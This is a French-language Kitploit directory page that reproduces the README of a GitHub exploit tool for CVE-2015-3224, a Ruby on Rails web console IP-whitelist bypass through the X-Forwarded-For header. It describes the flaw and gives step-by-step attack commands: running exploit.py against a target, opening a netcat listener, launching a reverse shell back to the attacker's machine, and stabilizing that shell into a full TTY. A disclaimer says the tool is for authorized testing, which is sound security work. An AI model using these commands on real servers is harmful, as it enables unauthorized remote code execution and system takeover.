Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2015-3224 — Exploit de la console web Ruby on Rails (CVE-2015-3224) | Kitploit
Outils/GitHubGitHub/sic4rio/cve-2015-3224
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

Exploit de la console web Ruby on Rails (CVE-2015-3224)

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Ruby on Rails Web Console Exploit (CVE-2015-3224)

CVE-2015-3224

Ce référentiel contient un script Python pour exploiter une vulnérabilité de contournement de la liste blanche d'adresses IP dans la console de développement Web de Ruby on Rails 4.0.x et 4.1.x. Le script permet l'exécution de code à distance sur les serveurs vulnérables.

⚠️ Avertissement Ce script est destiné à des fins éducatives et à des tests de sécurité autorisés uniquement. Ne l'utilisez pas sur un système sans autorisation explicite. Les auteurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par ce script.


📌 Description de la vulnérabilité

La console Web dans les versions vulnérables de Ruby on Rails est destinée à des fins de développement et ne devrait être accessible qu'à partir d'adresses IP de confiance. Cependant, en raison d'une gestion incorrecte de l'en-tête HTTP X-Forwarded-For, un attaquant peut usurper son adresse IP pour apparaître comme un utilisateur local de confiance (par exemple, 127.0.0.1 ou ::1). Cela contourne la liste blanche des adresses IP et accorde un accès non autorisé à la console Web, conduisant à une exécution de code à distance.


🚀 Fonctionnalités

  • Facile à utiliser : interface en ligne de commande simple.
  • Découverte dynamique du chemin : explore automatiquement la cible pour trouver le chemin de session de la console dynamique.
  • Deux modes de shell :
    • Shell simple : un shell basique non interactif pour des commandes rapides.
    • Shell TTY inversé : une commande d'une ligne pour obtenir un shell inverse PTY entièrement interactif.
  • Lisibilité améliorée : sortie colorée pour les messages d'état, les succès et les erreurs.
  • Robuste : inclut la gestion des erreurs pour les problèmes réseau et les échecs de commandes.

✅ Prérequis

  • Python 3
  • Bibliothèque requests

Installer requests :

root@kitploit:~
pip install requests

⚙️ Utilisation

  1. Cloner le dépôt :

    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <nom-du-dossier>
    
  2. Rendre le script exécutable :

    root@kitploit:~
    chmod +x exploit.py
    

Option 1 : Shell interactif simple

Ce mode est utile pour exécuter des commandes simples et rapides.

root@kitploit:~
./exploit.py -t http://<IP_CIBLE>:<PORT>

Option 2 : Shell TTY interactif complet (reverse shell)

Ce mode est recommandé pour un shell stable et entièrement interactif.

Étape 1 : Démarrer un écouteur

Sur votre machine locale, ouvrez un nouveau terminal et démarrez un écouteur netcat.

root@kitploit:~
nc -lvnp 9001

Étape 2 : Exécuter l'exploit

Dans un autre terminal, exécutez le script avec l'option --rev-shell, en fournissant votre IP locale (lhost) et votre port (lport).

root@kitploit:~
./exploit.py -t http://<IP_CIBLE>:<PORT> --rev-shell --lhost <VOTRE_IP> --lport 9001

Étape 3 : Stabiliser le shell

Une connexion arrivera sur votre écouteur netcat. Pour l'améliorer en un shell TTY entièrement interactif, suivez ces étapes dans la fenêtre netcat :

  1. Mettez le shell en arrière-plan en appuyant sur Ctrl+Z.
  2. Passez votre terminal local en mode brut et ramenez le shell au premier plan.
    root@kitploit:~
    stty raw -echo; fg
    
    Appuyez sur Entrée si l'invite ne réapparaît pas.
  3. Définissez les propriétés du terminal sur le shell distant.
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

Vous avez maintenant un shell stable et entièrement fonctionnel !


👥 Crédits

  • Exploit original : Eval (@0xEval)
  • Le fichier Readme.md : GPT
Télécharger l’outil